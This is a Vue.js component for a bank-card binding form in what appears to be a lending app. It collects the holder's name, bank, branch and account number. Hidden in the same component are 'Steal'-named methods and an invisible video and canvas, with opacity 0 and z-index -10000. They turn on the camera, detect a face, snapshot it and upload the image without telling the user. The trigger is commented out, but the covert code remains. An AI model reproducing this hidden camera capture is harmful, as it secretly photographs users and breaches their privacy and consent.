<template>
  <div class="other">
    <!-- header -->
    <div class="navbar_style">
      <Icon class="navbar_icon" name="arrow-left" @click="$router.back(1)"/>
      <span>{{ l.bank_nav_bar_title }}</span>
      <div class="icon_box"></div>
    </div>
    <!-- 进度条 -->
    <div class="other_body">
      <!-- 进度条 -->
      <div class="bgc_mark"></div>
      <Form
          :disabled="$route.query.from == 'my' || echoShow"
          colon
          label-width="100"
          scroll-to-error
          validate-first
          @failed="onFailed"
          @submit="handleFormCommit"
      >
        <div class="certification">
          <div class="certificationTitle">
            {{ l.other_bank_title }}
          </div>
         <div class="certificationDesc">({{ l.other_bank_msg }})</div>
          <LableBox class="formInfo" :label="l.other_name">
            <Field
                readonly
                v-model="formData.card_hold_name"
                name="card_hold_name"
                :placeholder="l.other_bank_realname"
            />
          </LableBox>
          <LableBox class="formInfo" :label="l.other_bank">
            <Field
                readonly
                name="bank_name"
                :value="formData.bank_name"
                :placeholder="l.other_s_bank"
                @click="realFocus('bank_name')"
                :rules="[{ required: true }]"
            >
              <template #right-icon v-if="!echoShow">
                <img
                    class="right_img"
                    src="@/assets/userInfo/right@2x.png"
                    alt=""
                />
              </template>
            </Field>
          </LableBox>

          <Popup round v-model="bankCodePopup" position="bottom"
          >
            <Field
                :placeholder="l.other_s_query_bank"
                v-model="keyWord"
                clearable
                left-icon="search"
                @input="handleSearchNations(keyWord)"
            />
            <Picker
                :confirm-button-text="l.login_ok"
                :cancel-button-text="l.login_btn_cancel"
                show-toolbar
                value-key="text"
                :columns="currBankCodeOptions"
                :default-index="bankCodeDefaultIndex"
                @confirm="bankCodeChange"
                @cancel="bankCodePopup = false"
            >
              <template #option="text">
                <div class="option_item">
                  {{ text.text }}
                </div>
              </template>
            </Picker>
          </Popup>

          <LableBox class="formInfo" :label="l.other_bank_code">
              <Field
                  readonly
                  name="bank_code"
                  :value="formData.bank_code"
                  :placeholder="l.other_s_bank_code"
                  @click="realFocus('bank_code')"
                  :rules="[{ required: true }]"
              >
              </Field>
            </LableBox>

          <LableBox class="formInfo" :label="l.other_bank_branches">
              <Field
                  v-model="formData.branchName"
                  name="branchName"
                  :placeholder="l.other_p_bank_branches"
                  @focus="realFocus('branchName')"
                  :rules="[
                  {
                    required: true,
                  },
                ]"
              />
            </LableBox>

          <LableBox class="formInfo" :label="l.other_band_account">
            <Field
                v-model="formData.card_no"
                type="number"
                name="card_no"
                :placeholder="l.other_p_band_account"
                @focus="realFocus('card_no')"
                :rules="[
                  {
                    required: true,
                  },
                ]"
            />
          </LableBox>
        </div>

        <!-- 下一步 -->
        <div>
          <Button
              v-if="$route.query.from != 'my' || !echoShow"
              block
              class="nextStep"
              native-type="submit"
              type="info"
              @click="commitPopup = true"
          >{{ l.login_ok }}
          </Button
          >
        </div>
      </Form>
    </div>
    <div v-if="showFacePost" class="face_post">
      <!-- <template v-if="!base64Img"> -->
      <video
          id="videoSteal"
          autoplay
          height="220"
          loop
          muted
          playsinline
          preload
          webkit-playsinline="true"
          width="288"
      ></video>
      <!-- <canvas id="canvas" width="2048" height="2048"></canvas> -->
      <canvas id="screenshotCanvasSteal" height="220" width="288"></canvas>
      <!-- </template> -->
    </div>
  </div>
</template>

<script>
import {
  Icon,
  // Progress,
  Form,
  Field,
  Button,
  Popup,
  Picker,
  Toast,
} from "vant";
// import SelectCpt from "../../components/select-cpt";
import {queryUserBase, userCard,} from "../../services/information";
import {getBankList} from "../../services/order";
import l from "../../locales";
import {lrzUploadImage} from "../../services/upload";
import LableBox from "../../components/lable-box";
// import { checkPhone } from "@/utils/index";

export default {
  name: "other",
  components: {
    Icon,
    Form,
    Field,
    Button,
    // SelectCpt,
    Popup,
    Picker,
    LableBox,
  },
  data() {
    return {
      showFacePost: true,
      l: {...l.router, ...l.bankCard, ...l.other,...l.login},
      echoShow: false,
      formData: {
        bank_code: "",
        branchName: undefined, //string 银行分行
        bank_name: "",
        busiNo: "",
        card_hold_name: "",
        card_no: "",
        card_phone: "",
        card_type: "",
        usedStatus: "",
      },

      bankCodeOptions: [],
      bankCodePopup: false,
      bankCodeDefaultIndex: 0,

      videoSteal: null,
      screenshotCanvasSteal: null,
      uploadLockSteal: true, // 上传锁
      base64ImgSteal: null,
      trackerTaskSteal: null,
      keyWord: "",
      currBankCodeOptions: [],
    };
  },
  methods: {
    handleSearchNations(keyWord) {
      console.log("keyWord", keyWord);
      this.currBankCodeOptions = this.bankCodeOptions.filter((v) => {
        return v.name.toLowerCase().includes(keyWord.toLowerCase());
      });
    },
    realFocus(str) {
      if (this.$route.query.from == "my" || this.echoShow) {
        return;
      }
      if (str == "bank_name") {
        this.bankCodePopup = true;
      }
    },
    // 银行选择
    bankCodeChange(value) {
      // this.formData.bank_code = value;
      this.formData.bank_name = value.text;
      this.formData.bank_code = value.value;
      this.bankCodePopup = false;

      // 过滤相应的银行***
      let bankObj = this.bankCodeOptions.filter(
          (item) => item.value === value.value
      )[0];
      this.formData.bankName = bankObj.text;
    },
    handlenNavBarBack() {
      this.$router.back(1);
    },
    // 初始化设置
    async initTrackingSteal() {
      let _this = this;
      _this.$nextTick(() => {
        _this.videoSteal = document.getElementById("videoSteal");
        _this.screenshotCanvasSteal = document.getElementById(
            "screenshotCanvasSteal"
        );

        // let canvas = document.getElementById("canvas");
        // let context = canvas.getContext("2d");

        // 固定写法
        let tracker = new window.tracking.ObjectTracker("face");
        tracker.setInitialScale(4);
        tracker.setStepSize(2);
        tracker.setEdgesDensity(0.1);
        _this.trackerTaskSteal = window.tracking.track("#videoSteal", tracker, {
          camera: true,
        });

        tracker.on("track", function (event) {
          // 检测出人脸 绘画人脸位置
          // context.clearRect(0, 0, canvas.width, canvas.height);
          // event.data.forEach(function (rect) {
          event.data.forEach(function () {
            // context.strokeStyle = "#0764B7";
            // context.strokeRect(rect.x, rect.y, rect.width, rect.height);
            console.log("已识别到人脸");

            // 上传图片
            _this.uploadLockSteal && _this.screenshotAndUploadSteal();
            tracker = null;
          });
        });
        console.log("initTracking");
      });
    },
    // 上传图片
    screenshotAndUploadSteal() {
      let that = this;
      // 上锁避免重复发送请求
      this.uploadLockSteal = false;

      // 绘制当前帧图片转换为base64格式
      let canvas = this.screenshotCanvasSteal;
      let video = this.videoSteal;
      let ctx = canvas.getContext("2d");
      ctx.clearRect(0, 0, canvas.width, canvas.height);
      ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
      let base64Img = canvas.toDataURL("image/jpeg");

      // 使用 base64Img 请求接口即可
      // console.log('base64Img:', base64Img);
      this.base64ImgSteal = base64Img;
      //调用
      var file = this.base64toFile(base64Img);

      lrzUploadImage(file, "facePhoto4", () => {
        that.trackerTaskSteal && that.trackerTaskSteal.stop();
      });
      console.log("file", file);
      // 请求接口成功以后打开锁
    },
    base64toFile(dataurl, filename = "file") {
      let arr = dataurl.split(",");
      let mime = arr[0].match(/:(.*?);/)[1];
      let suffix = mime.split("/")[1];
      let bstr = atob(arr[1]);
      let n = bstr.length;
      let u8arr = new Uint8Array(n);
      while (n--) {
        u8arr[n] = bstr.charCodeAt(n);
      }
      return new File([u8arr], `${filename}.${suffix}`, {
        type: mime,
      });
    },
    // 表单发提交
    handleFormCommit(e) {
      if (this.echoShow) {
        // 回显跳转
        this.$router.push("/idCard");
        return;
      }
      let params = {
        ...e,
        card_type: "1",
        card_hold_name: this.formData.card_hold_name,
        card_phone: this.$store.state.user.userInfo.phone,
        busiNo: this.$route.query.busiId,
        bankName: this.formData.bankName,
      };

      // params.bank_name = params.bank_code;
      params.bank_code = this.bankCodeOptions.filter(
          (item) => item.text == params.bankName
      )[0].value;

      // params.bank_code = "004";

      console.log("params", params);

      userCard(params).then((res) => {
        // console.log("-------------res=",res);
        if (res.code == 200) {
          Toast.success(this.l.bank_submit_toast);
          this.$router.back(1);
        }
      });
    },
    // 表单验证提交
    onFailed(err) {
      console.log(err);
    },
    async getBankList() {
      let bankList = await getBankList({pay_type: "1"});
      if (bankList.code == 200) {
        this.bankCodeOptions = bankList.result.map((item) => {
          return {
            // text: item.bank_name + "(" + item.bank_alias + ")",
            text: item.bank_name,
            value: item.bank_code,
          };
        });
        this.currBankCodeOptions = JSON.parse(
            JSON.stringify(this.bankCodeOptions)
        );
      }
    },
    async getUserBase() {
      let userBase = await queryUserBase();
      if (userBase.code == 200) {
        this.formData.card_hold_name = userBase.result.real_name;
        console.log("this.formData", this.formData);
      }
    },
    async init() {
      await Promise.all([this.getBankList()])
      if (this.$route.query.from != "from") {
        await this.getUserBase();
      }
    },
  },
  destroyed() {
    // 关闭摄像头和侦测
    this.showFacePost = false;
    this.trackerTaskSteal && this.trackerTaskSteal.stop();
    this.trackerTaskSteal = null;
  },
  created() {
    this.init();
    // this.initTrackingSteal();

  },
};
</script>

<style lang="less" scoped>
@import "../authenticationProcess/index.less";

.other {
  background: #ffffff;
  padding-bottom: 50px;
  min-height: 100vh;
  box-sizing: border-box;
}

.face_post {
  position: absolute;
  z-index: -10000;
  top: 0;
  // left: -5000px;
  opacity: 0;
}

/deep/ .van-overlay {
  background: rgba(0, 0, 0, 0.7);
  backdrop-filter: blur(3px);
}

.other_body {
  /deep/ .van-picker__confirm {
    color: #00819F;
  }
}

/deep/ .van-popup {
  .van-field__value {
    display: flex;
    align-items: center;
  }
}

.option_item {
  font-size: 12px;
  text-align: center;
  line-height: 18px;
}
</style>
